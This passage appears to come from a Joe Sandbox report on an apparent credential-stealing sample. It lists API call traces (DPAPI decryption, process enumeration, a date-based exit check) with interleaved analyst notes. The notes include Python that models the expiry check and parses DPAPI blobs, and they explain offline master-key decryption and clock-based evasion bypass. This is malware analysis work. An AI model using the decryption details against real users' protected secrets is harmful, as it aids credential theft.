                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !|rs$9e8_$:c}o$X;B$d<~
                              • API String ID: 0-2042879810
                              • Opcode ID: a478e5c53bb335b3ec5f6d28448d4fcf62d3ebd1d6569ce676b6cd090352a812
                              • Instruction ID: d255154075d61f787b4cd382142d61a76218bf5787569cf181ec1e29d2c1243d
                              • Opcode Fuzzy Hash: a478e5c53bb335b3ec5f6d28448d4fcf62d3ebd1d6569ce676b6cd090352a812
                              • Instruction Fuzzy Hash: EFA208F360C2049FE7046E2DEC8567AFBE9EF94720F1A4A3DEAC4C7344E63558058696
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001BC871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001BC87C
                              • lstrcat.KERNEL32(?,001D0B46), ref: 001BC943
                              • lstrcat.KERNEL32(?,001D0B47), ref: 001BC957
                              • lstrcat.KERNEL32(?,001D0B4E), ref: 001BC978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: ac010033d6caeda5c1cbb43cd11db59e8aef849c8c351b2ec98d1429b70f97ba
                              • Instruction ID: cd857fe91165e15568e0652c8584304a22ecba84e16d4dde79fa14e2056795eb
                              • Opcode Fuzzy Hash: ac010033d6caeda5c1cbb43cd11db59e8aef849c8c351b2ec98d1429b70f97ba
                              • Instruction Fuzzy Hash: D4414DB590421ADFDB10DFA4DD89BFEF7B8BB48704F1041A9E509A7280D7749A84CF91
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 001C696C
                              • sscanf.NTDLL ref: 001C6999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001C69B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001C69C0
                              • ExitProcess.KERNEL32 ref: 001C69DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 134a3518bc817f9f2d4aa504b9e3bc59c8622e530d9c5b02319e0c795c7162fc
                              • Instruction ID: b812fd8c81747799fe7c9b600cc7568acc4ff433eb86848873a8e7609ecd3086
                              • Opcode Fuzzy Hash: 134a3518bc817f9f2d4aa504b9e3bc59c8622e530d9c5b02319e0c795c7162fc
                              • Instruction Fuzzy Hash: 3A21BAB5D14208ABCF05EFE4D945AEEB7B9BF58304F04852EE40AA3250EB749605CBA5
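The GetSystemTime, sscanf, SystemTimeToFileTime, SystemTimeToFileTime, ExitProcess sequence in the entry above has the shape of a build-expiry check: the current SYSTEMTIME and a date parsed out of an embedded string are both converted to FILETIME so they can be compared as plain 64-bit integers, and the process exits when the clock is past the embedded date. That reading is inferred from the call order; the report does not state it, and neither the string nor its sscanf format is on this page. The Python below is an added analyst-side model of that comparison, not code from the sample or from Joe Sandbox. The "YYYY-MM-DD" layout and the inputs are assumptions made for the demonstration; the FILETIME arithmetic itself is exact.

```python
"""Model of GetSystemTime -> sscanf -> SystemTimeToFileTime (x2) -> compare
-> ExitProcess. Added illustration; not the sample's own code."""
import datetime as dt
import re

# FILETIME counts 100 ns ticks since 1601-01-01 UTC. This is the standard
# tick offset between that epoch and 1970-01-01 UTC.
EPOCH_DIFF_TICKS = 116_444_736_000_000_000
TICKS_PER_SECOND = 10_000_000


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, ms=0):
    """Equivalent of SystemTimeToFileTime for a UTC SYSTEMTIME: returns the
    64-bit tick count that the two compare operands hold."""
    t = dt.datetime(year, month, day, hour, minute, second, tzinfo=dt.timezone.utc)
    unix_seconds = int(t.timestamp())
    return unix_seconds * TICKS_PER_SECOND + EPOCH_DIFF_TICKS + ms * 10_000


def parse_expiry(text):
    """Stand-in for the sscanf call. The 'YYYY-MM-DD' layout is an assumption;
    the real format string is in the sample, not on the report page."""
    m = re.fullmatch(r"\s*(\d{4})-(\d{1,2})-(\d{1,2})\s*", text)
    if not m:
        raise ValueError(f"expiry string not in expected layout: {text!r}")
    year, month, day = (int(g) for g in m.groups())
    return year, month, day


def would_exit(systemtime, expiry_text):
    """True when the modelled check reaches ExitProcess.

    systemtime is (year, month, day, hour, minute, second, ms), i.e. the
    SYSTEMTIME fields GetSystemTime fills (day-of-week omitted). The exit
    condition modelled here is 'current FILETIME strictly greater than the
    expiry FILETIME'; equality does not exit."""
    now_ft = systemtime_to_filetime(*systemtime)
    expiry_ft = systemtime_to_filetime(*parse_expiry(expiry_text))
    return now_ft > expiry_ft


if __name__ == "__main__":
    # Constructed inputs: a sandbox clock one day after a constructed expiry.
    clock = (2024, 10, 25, 12, 0, 0, 0)
    print("exits:", would_exit(clock, "2024-10-24"))
```

The practical consequence for a sandbox run is that a sample carrying such a check produces no further behaviour once the host clock is past the date, so a re-run with the analysis VM clock set back to the sample's first-seen date is the usual way to get past it.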
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001B724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B7254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001B7281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001B72A4
                              • LocalFree.KERNEL32(?), ref: 001B72AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: e1e769a15aadaba6a9b9a4767911e328ad6e5fa514ebbeac1fbdb853a9659184
                              • Instruction ID: 3b6b35811efd84eace670a8baf884f451495fb751cdb78a748cdc08016e71023
                              • Opcode Fuzzy Hash: e1e769a15aadaba6a9b9a4767911e328ad6e5fa514ebbeac1fbdb853a9659184
                              • Instruction Fuzzy Hash: 030100B5A40208BBDB14DBE4CD45FAE77B8AB48704F104155FB09AB2C0D7B0AA00CB65
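In the entry above, CryptUnprotectData is called with dwFlags 1, which is CRYPTPROTECT_UI_FORBIDDEN (fail rather than prompt when the protecting key is unavailable); the buffer comes from RtlAllocateHeap with flags 8 (HEAP_ZERO_MEMORY) and size 0x400; WideCharToMultiByte is called with code page 0 (CP_ACP) and cbMultiByte 0x400, so a UTF-16 string, presumably the decrypted output, is narrowed into that buffer before LocalFree releases the DPAPI result. That is the usual shape of a stealer reading a DPAPI-protected secret; which secret is not identified on this page. The Python below is an added analyst-side parser for the DPAPI blob header, not code from the sample or from Joe Sandbox: given a blob recovered from disk or from one of the dumps listed above, it reports the provider GUID, the master-key GUID needed for offline decryption, and the cipher and hash algorithm IDs, without calling DPAPI. The field layout is the public DPAPI blob structure; the blob it parses is constructed inline and carries placeholder ciphertext, not a real encryption.

```python
"""DPAPI blob header parser. Added analyst-side illustration; not the
sample's or Joe Sandbox's code. Layout: version, provider GUID, master-key
version, master-key GUID, flags, description, crypt ALG_ID and key bits,
salt, HMAC key, hash ALG_ID and bits, HMAC2 key, ciphertext, signature."""
import struct
import uuid

# Every blob produced by CryptProtectData carries this provider GUID.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
# dwFlags value passed to CryptUnprotectData in the entry above.
CRYPTPROTECT_UI_FORBIDDEN = 0x1
# ALG_ID values from wincrypt.h, used for the constructed blob below.
CALG_AES_256 = 0x6610
CALG_SHA_512 = 0x800E


class _Reader:
    """Little-endian cursor over the blob bytes."""

    def __init__(self, data):
        self.data, self.off = data, 0

    def u32(self):
        (v,) = struct.unpack_from("<I", self.data, self.off)
        self.off += 4
        return v

    def guid(self):
        g = uuid.UUID(bytes_le=bytes(self.data[self.off:self.off + 16]))
        self.off += 16
        return g

    def counted(self):
        """A DWORD length followed by that many bytes."""
        n = self.u32()
        chunk = self.data[self.off:self.off + n]
        if len(chunk) != n:
            raise ValueError("truncated DPAPI blob")
        self.off += n
        return chunk


def parse_dpapi_blob(data):
    """Return the header fields of a DPAPI blob as a dict. Raises ValueError
    when the provider GUID is wrong, so arbitrary bytes are not mis-parsed."""
    r = _Reader(data)
    version = r.u32()
    provider = r.guid()
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"not a DPAPI blob: provider {provider}")
    mk_version = r.u32()
    mk_guid = r.guid()
    flags = r.u32()
    description = r.counted().decode("utf-16-le").rstrip("\x00")
    alg_crypt, alg_crypt_bits = r.u32(), r.u32()
    salt = r.counted()
    r.counted()                      # HMAC key (legacy field)
    alg_hash, alg_hash_bits = r.u32(), r.u32()
    r.counted()                      # HMAC2 key
    ciphertext = r.counted()
    signature = r.counted()
    return {
        "version": version,
        "master_key_guid": str(mk_guid),
        "master_key_version": mk_version,
        "flags": flags,
        "description": description,
        "alg_crypt": alg_crypt,
        "alg_crypt_bits": alg_crypt_bits,
        "alg_hash": alg_hash,
        "alg_hash_bits": alg_hash_bits,
        "salt_len": len(salt),
        "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


def is_dpapi_blob(data):
    """Cheap triage test for candidate bytes pulled from a dump."""
    try:
        parse_dpapi_blob(data)
        return True
    except (ValueError, struct.error):
        return False


def build_test_blob(master_key_guid, description="constructed", secret_len=32):
    """Construct a syntactically valid blob so the parser can run offline.
    Ciphertext and signature are placeholder bytes, not real DPAPI output."""
    def lp(b):
        return struct.pack("<I", len(b)) + b

    desc = (description + "\x00").encode("utf-16-le")
    return (
        struct.pack("<I", 1)
        + DPAPI_PROVIDER_GUID.bytes_le
        + struct.pack("<I", 1)
        + uuid.UUID(master_key_guid).bytes_le
        + struct.pack("<I", 0)
        + lp(desc)
        + struct.pack("<II", CALG_AES_256, 256)
        + lp(b"\x11" * 32)          # salt
        + lp(b"")                   # HMAC key, empty in this constructed blob
        + struct.pack("<II", CALG_SHA_512, 512)
        + lp(b"\x22" * 32)          # HMAC2 key
        + lp(b"\x00" * secret_len)  # ciphertext placeholder
        + lp(b"\x33" * 64)          # signature placeholder
    )
```

The master-key GUID is the field worth pulling first: it names the master key file under the user's Protect directory that, together with the user's credentials, lets the blob be decrypted offline on an analyst machine instead of on the victim.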
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C961E
                              • Process32First.KERNEL32(001D0ACA,00000128), ref: 001C9632
                              • Process32Next.KERNEL32(001D0ACA,00000128), ref: 001C9647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 001C965C
                              • CloseHandle.KERNEL32(001D0ACA), ref: 001C967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: 5103565078bd6413f4c14319edf8229fd6a3da103b56aed77949f5b8d51c47d1
                              • Instruction ID: 8d6b78ce59ba46708e171b0797572fd0aabeae1278cb7b89e353b22a95d8e324
                              • Opcode Fuzzy Hash: 5103565078bd6413f4c14319edf8229fd6a3da103b56aed77949f5b8d51c47d1
                              • Instruction Fuzzy Hash: 1201E9B5A00218ABCB15DFA5CD48FEDBBF8AB58740F104188A90996290E774AA44DF51
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ,<o~$/N=$Me}=$6i{
                              • API String ID: 0-185543882
                              • Opcode ID: b49f31549480b60a8ffae5d267b04f5b20b3377b55a421055e7e6957b629285b
                              • Instruction ID: 48fa2f4bac4aab521d64d85e3faeaacbef44c27aba4eeaedfacd959656bc9b46
                              • Opcode Fuzzy Hash: b49f31549480b60a8ffae5d267b04f5b20b3377b55a421055e7e6957b629285b
                              • Instruction Fuzzy Hash: AEA204F390C2149FE7047E29EC8576ABBE5EF94320F1A4A3DEAC593744EA3558008797
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: %Es$>Nm$J&V*$_'^
                              • API String ID: 0-3781541614
                              • Opcode ID: 0db91957582bc2e4d9e5a683aff70552c451b622ce75c3c12f78c4821559a316
                              • Instruction ID: 91899001cd5416d1f5c732de44bdab0f1a0d63ddb172b54ec5a0251feb7c792f
                              • Opcode Fuzzy Hash: 0db91957582bc2e4d9e5a683aff70552c451b622ce75c3c12f78c4821559a316
                              • Instruction Fuzzy Hash: 3F92D4F390C6149FE304AF29DC8566AFBE5EF94720F16892DEAC4C3744E63598018B97
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,001B5184,40000001,00000000,00000000,?,001B5184), ref: 001C8EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: c3426beec34639b9793e91af6cac8690dd36ad61ec0fd71c0954f3c99700e8de
                              • Instruction ID: 05f1b3bc3af1d4f645ac41dc94f11558214c1e37fa0e8384b8d1c21eb82cb549
                              • Opcode Fuzzy Hash: c3426beec34639b9793e91af6cac8690dd36ad61ec0fd71c0954f3c99700e8de
                              • Instruction Fuzzy Hash: FC1100B0200209AFDB04CFA4E889FBB37AAAF99314F10945CF919CB250DB75E841DB60
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9AEF
                              • LocalAlloc.KERNEL32(00000040,?,?,?,001B4EEE,00000000,?), ref: 001B9B01
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9B2A
                              • LocalFree.KERNEL32(?,?,?,?,001B4EEE,00000000,?), ref: 001B9B3F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID:
                              • API String ID: 4291131564-0
                              • Opcode ID: 618f8f5427517b3b1e5f18acddd5f1b53a9c0f0186491cfd0e95bea30fc7a881
                              • Instruction ID: e19e4910c0ba1bc18329fdd64a01906db40ac23f598819bc2b830a8624ae11f3
                              • Opcode Fuzzy Hash: 618f8f5427517b3b1e5f18acddd5f1b53a9c0f0186491cfd0e95bea30fc7a881
                              • Instruction Fuzzy Hash: 8511A4B4240308AFEB11CF64DC95FAA77B9FB89700F208058FA199B390C7B5A901CB50
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00EEDB10,00000000,?,001D0E10,00000000,?,00000000,00000000), ref: 001C7A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00EEDB10,00000000,?,001D0E10,00000000,?,00000000,00000000,?), ref: 001C7A7D
                              • wsprintfA.USER32 ref: 001C7AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: 19c44fa74563232e8f852f10973a551bff6926a07384420d3ed7d4fda33cd754
                              • Instruction ID: 91bf6e597dbfbdc51fd42ff8b65078d819e09e866767fa84c1c4a201d079aede
                              • Opcode Fuzzy Hash: 19c44fa74563232e8f852f10973a551bff6926a07384420d3ed7d4fda33cd754
                              • Instruction Fuzzy Hash: DF118EB1945618EFEB208B54DC49FA9BBB8FB04761F10479AE90A932C0D7B49E40CF51
                              APIs
                              • CoCreateInstance.COMBASE(001CE118,00000000,00000001,001CE108,00000000), ref: 001C3758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 001C37B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
